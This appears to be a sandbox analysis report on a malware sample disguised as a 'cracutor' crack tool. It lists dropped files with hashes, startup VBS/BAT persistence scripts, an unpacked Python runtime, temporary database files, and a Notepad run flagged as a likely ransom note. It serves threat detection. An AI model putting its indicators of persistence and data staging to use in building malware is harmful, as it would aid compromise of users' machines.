memory/4224-0-0x00007FFC70633000-0x00007FFC70635000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wtpccnc4.vyz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4224-1-0x00000241D7420000-0x00000241D7442000-memory.dmp

memory/4224-11-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/4224-12-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/4224-13-0x00000241D7480000-0x00000241D7488000-memory.dmp

memory/4224-14-0x00000241E1980000-0x00000241E1B8A000-memory.dmp

memory/1252-25-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/1252-26-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/1252-27-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/1252-30-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ee6f5f5e5924783870aeedeccdafe9da
SHA1 0e12ede20df5ec37f2bf3608ad1bc9b4649450fd
SHA256 ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416
SHA512 998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

C:\Users\Admin\AppData\Roaming\startup_str_863.vbs

MD5 46ecfea8ca77a5ea8761e315d86a0acf
SHA1 9d3335c8ceea2de5440b7a1b0dfcb9b504c76fc5
SHA256 7412fe1fa18a3dd64d8bf77e7715957d91c3d1a65b90906969dfccfe9ba663d1
SHA512 eb61425b5501bb72bcb48801d7e38ceaaad56d9c8fd522976a577cd6058e7897748661437e57ece47c63ee8b9cc1553991552fc19f0d9a3e381b64cc7766586e

C:\Users\Admin\AppData\Roaming\startup_str_863.bat

MD5 5f2ca709edfb4aab62c0d293fc078a8d
SHA1 e0ee77775465e261c7e0f48643c6d66af21841c2
SHA256 5edd619490ce715b05fa88acb9865fa2c290949483b5813f70083d4480e4bf05
SHA512 833edd2aadcd390eeb9e264bdcbb790fa013b3141a5e092ed4f23b819903f6fce0edd68e337dd8801bc3529b80521b2aeddf06f245a6df37d1a3b2af97d41eaf

memory/928-51-0x0000024BA5380000-0x0000024BA5394000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

MD5 03d0c69e31fd77718e661722361c0a5c
SHA1 04e02539771963a628477f6546be48d2d912a612
SHA256 255834540df95d84167a197acc6e70d9b80baa5dc15ddb16060508be498f1e78
SHA512 94ed7ee2ad72a4b80fc9121483c5b95ad2a1036b3a20f60499d59cc1255635bcade467952b828a3b27415ddd799c8b3a89476bc0f34726292f6632249fa0d986

memory/4852-62-0x0000000000CB0000-0x0000000000EAE000-memory.dmp

memory/4224-63-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/4852-65-0x0000000005A80000-0x0000000005B1E000-memory.dmp

memory/4852-66-0x0000000005EE0000-0x0000000005F72000-memory.dmp

memory/4852-64-0x0000000006030000-0x00000000065D4000-memory.dmp

memory/4852-69-0x0000000005ED0000-0x0000000005EDE000-memory.dmp

memory/4852-68-0x0000000005FC0000-0x0000000005FF8000-memory.dmp

memory/4852-67-0x0000000005EB0000-0x0000000005EB8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a7cc007980e419d553568a106210549a
SHA1 c03099706b75071f36c3962fcc60a22f197711e0
SHA256 a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165
SHA512 b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

memory/928-121-0x0000024B82950000-0x0000024B8295E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\idcljz.exe

MD5 5076e1777bdc18710ed70c27b96a95db
SHA1 cb24ad63bd9598bccf46e64b576144b2e5be7d53
SHA256 73d2131cdc04f4751f9c6911607a76192bd5e440ec597291cba1acb1aba8f201
SHA512 8d931a5dc1e4cfd7e0876e6f35ba8a2756a44957f746b3c996d6753f089ef127557e483ff434aa2861ae12071a4a68c3eafcacd5930e5f1234fb91831cc67de9

C:\Users\Admin\AppData\Local\Temp\_MEI13922\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

memory/928-223-0x0000024BA5900000-0x0000024BA5A20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI13922\base_library.zip

MD5 e390f6f8210ec8f625e41d032892a555
SHA1 1942cd3974970e436f51d08284d216af91bd563f
SHA256 072a34a29da732afb01237adcc33198842edd473d014cf6b7f0ee3285f8b42d4
SHA512 b577eee901ce55fcc63403caa782a6f36dc20c18894508f78cac7d0d03c5ce0771bd4671525d7f0b5a86bf0afe0b09afea38d4e07767a8154ccc8cc27b3a295b

C:\Users\Admin\AppData\Local\Temp\_MEI13922\python3.DLL

MD5 a5471f05fd616b0f8e582211ea470a15
SHA1 cb5f8bf048dc4fc58f80bdfd2e04570dbef4730e
SHA256 8d5e09791b8b251676e16bdd66a7118d88b10b66ad80a87d5897fadbefb91790
SHA512 e87d06778201615b129dcf4e8b4059399128276eb87102b5c3a64b6e92714f6b0d5bde5df4413cc1b66d33a77d7a3912eaa1035f73565dbfd62280d09d46abff

C:\Users\Admin\AppData\Local\Temp\_MEI13922\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_lzma.pyd

MD5 5a77a1e70e054431236adb9e46f40582
SHA1 be4a8d1618d3ad11cfdb6a366625b37c27f4611a
SHA256 f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e
SHA512 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635

C:\Users\Admin\AppData\Local\Temp\_MEI13922\select.pyd

MD5 78d421a4e6b06b5561c45b9a5c6f86b1
SHA1 c70747d3f2d26a92a0fe0b353f1d1d01693929ac
SHA256 f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823
SHA512 83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_queue.pyd

MD5 c9ee37e9f3bffd296ade10a27c7e5b50
SHA1 b7eee121b2918b6c0997d4889cff13025af4f676
SHA256 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a
SHA512 c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_socket.pyd

MD5 5dd51579fa9b6a06336854889562bec0
SHA1 99c0ed0a15ed450279b01d95b75c162628c9be1d
SHA256 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c
SHA512 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_uuid.pyd

MD5 aeead50876ddb63cb8e882989041d7da
SHA1 c9bf23227ced84d39bd33665444de3e9064315c6
SHA256 c74aaeec487457139b47c0ab56e01922bfae6debef562800e5b9b6baf1ec9d6a
SHA512 74c8fe6cfd67e1984a2df9bd998ae363519de16b5840cabba01660154fbeac92e2c773ecc2884d531362e8a0b739673c44f450c1bea05ca33eef58a8e61bc2ca

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_ssl.pyd

MD5 11c5008e0ba2caa8adf7452f0aaafd1e
SHA1 764b33b749e3da9e716b8a853b63b2f7711fcc7c
SHA256 bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14
SHA512 fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_sqlite3.pyd

MD5 6486e5c8512bddc5f5606d11fe8f21e0
SHA1 650861b2c4a1d6689ff0a49bb916f8ff278bb387
SHA256 728d21be4d47dd664caf9fa60c1369fe059bc0498edd383b27491d0dee23e439
SHA512 f2c9267a3cab31190079037e3cc5614f19c1235852454708c4978008ea9da345892191750980aebc809cc83dd1f5788b60f8cf39a6a41623210c96af916d1821

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_overlapped.pyd

MD5 5bfe7d9e1877fdde718bb84b67d8be68
SHA1 ebc7389ccca80d92d7b891815843e4c7d066cd51
SHA256 fe5666c1c8215cd2773744c815fb4a3b2f52f64cf0dde25d458441da22bf5568
SHA512 9fbf4c77784677957b8ade962cc0730ef6cfa865c14c712fd2a978903596a92e359a5234095b2a23d9e4daf7abb4029cd855b91cba696fde448668ccf4a1efea

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_multiprocessing.pyd

MD5 fce357f864a558c03ed17755f87d0e30
SHA1 b74ecb2bee03a8ff209f52f652c011f28d5ae4d0
SHA256 000486aaac9dd21e88b3dc65fd854dd83519b1fbcc224a70530bc3ec8cbd1a5d
SHA512 564dea2bf3410011a76ca5ea376dba3ec9b2d03fd25248824f6c956fa5ea061c1a9ee6f6b65b021ea5bf9cc5e3ab9c6fcf4779446b920891a2c0979bbc57d58b

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_hashlib.pyd

MD5 cfb9e0a73a6c9d6d35c2594e52e15234
SHA1 b86042c96f2ce6d8a239b7d426f298a23df8b3b9
SHA256 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6
SHA512 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_decimal.pyd

MD5 1cdd7239fc63b7c8a2e2bc0a08d9ea76
SHA1 85ef6f43ba1343b30a223c48442a8b4f5254d5b0
SHA256 384993b2b8cfcbf155e63f0ee2383a9f9483de92ab73736ff84590a0c4ca2690
SHA512 ba4e19e122f83d477cc4be5e0dea184dafba2f438a587dd4f0ef038abd40cb9cdc1986ee69c34bac3af9cf2347bea137feea3b82e02cca1a7720d735cea7acda

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_cffi_backend.cp310-win_amd64.pyd

MD5 ebb660902937073ec9695ce08900b13d
SHA1 881537acead160e63fe6ba8f2316a2fbbb5cb311
SHA256 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd
SHA512 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_brotli.cp310-win_amd64.pyd

MD5 ee3d454883556a68920caaedefbc1f83
SHA1 45b4d62a6e7db022e52c6159eef17e9d58bec858
SHA256 791e7195d7df47a21466868f3d7386cff13f16c51fcd0350bf4028e96278dff1
SHA512 e404adf831076d27680cc38d3879af660a96afc8b8e22ffd01647248c601f3c6c4585d7d7dc6bbd187660595f6a48f504792106869d329aa1a0f3707d7f777c6

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_asyncio.pyd

MD5 6c2a86342ade2fac9454b83a49d17694
SHA1 52946875ad946e4a170072f38e28e10f6037fab9
SHA256 cf0edfd508d11bffb63d1b104b6099e0f14ea0fada762f88364e7163f2185f06
SHA512 48d8eb8d20d041df37c4a6f243056607754046ed5f497260751270b42e9eea6f22fb1fb62d015e841d0263534f50bf6c812a6ade0e8bb0a0f79226bc64d05c75

C:\Users\Admin\AppData\Local\Temp\_MEI13922\VCRUNTIME140_1.dll

MD5 7667b0883de4667ec87c3b75bed84d84
SHA1 e6f6df83e813ed8252614a46a5892c4856df1f58
SHA256 04e7ccbdcad7cbaf0ed28692fb08eab832c38aad9071749037ee7a58f45e9d7d
SHA512 968cbaafe416a9e398c5bfd8c5825fa813462ae207d17072c035f916742517edc42349a72ab6795199d34ccece259d5f2f63587cfaeb0026c0667632b05c5c74

C:\Users\Admin\AppData\Local\Temp\_MEI13922\unicodedata.pyd

MD5 a40ff441b1b612b3b9f30f28fa3c680d
SHA1 42a309992bdbb68004e2b6b60b450e964276a8fc
SHA256 9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08
SHA512 5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef

C:\Users\Admin\AppData\Local\Temp\_MEI13922\sqlite3.dll

MD5 7bb1d577405f1129faf3ea0225c9d083
SHA1 60472de4b1c7a12468d79994d6d0d684c91091ef
SHA256 831ba87cb1a91d4581f0abbcc4966c6f4b332536f70cf481f609c44cc3d987c2
SHA512 33b1fd3a289193bff168c967caebc0131732bd04562a770cf2edac602ab6d958f7bde7a0e57bb125a7598852bdac30f96d0db46cb4a2460a61a0d914b011ed20

C:\Users\Admin\AppData\Local\Temp\_MEI13922\pyexpat.pyd

MD5 983d8e003e772e9c078faad820d14436
SHA1 1c90ad33dc4fecbdeb21f35ca748aa0094601c07
SHA256 e2146bed9720eb94388532551444f434d3195310fa7bd117253e7df81a8e187e
SHA512 e7f0fd841c41f313c1782331c0f0aa35e1d8ba42475d502d08c3598a3aaefd400179c19613941cdfad724eca067dd1b2f4c2f1e8a1d6f70eeb29f7b2213e6500

C:\Users\Admin\AppData\Local\Temp\_MEI13922\libssl-1_1.dll

MD5 bd857f444ebbf147a8fcd1215efe79fc
SHA1 1550e0d241c27f41c63f197b1bd669591a20c15b
SHA256 b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf
SHA512 2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a

C:\Users\Admin\AppData\Local\Temp\_MEI13922\libcrypto-1_1.dll

MD5 63c4f445b6998e63a1414f5765c18217
SHA1 8c1ac1b4290b122e62f706f7434517077974f40e
SHA256 664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2
SHA512 aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_bz2.pyd

MD5 b45e82a398713163216984f2feba88f6
SHA1 eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839
SHA256 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8
SHA512 b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_ctypes.pyd

MD5 79f339753dc8954b8eb45fe70910937e
SHA1 3ad1bf9872dc779f32795988eb85c81fe47b3dd4
SHA256 35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007
SHA512 21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753

C:\Users\Admin\AppData\Local\Temp\_MEI13922\VCRUNTIME140.dll

MD5 11d9ac94e8cb17bd23dea89f8e757f18
SHA1 d4fb80a512486821ad320c4fd67abcae63005158
SHA256 e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e
SHA512 aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

C:\Users\Admin\AppData\Local\Tempcroirmokfr.db

MD5 079a696bcf1d85d290ea94324f8fea01
SHA1 15819c37e62568756e0c64af555b19c36f2b03c9
SHA256 97adfff767fb00f67212b0e36ade8d75f97f1e3619e1658193003e306d8a1afa
SHA512 7ffd8f6f23838beaa4ef4dbfce8347fb8725089e4271d8a2699c19ac5a42fb3868122d39fe0e13a6f132160934a81fe2c41c7d679f1236ad3c0f85b177ba0b65

C:\Users\Admin\AppData\Local\Tempcrjmuyfijo.db

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Tempcriqbtcknr.db

MD5 73bd1e15afb04648c24593e8ba13e983
SHA1 4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256 aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA512 6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

C:\Users\Admin\AppData\Local\Tempcruwuqkjxi.db

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Tempcrxigiyirb.db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Tempcrssiycfnb.db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/928-355-0x0000024BC61B0000-0x0000024BC6500000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

120s

Max time network

121s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"

Network

N/A

Files

N/A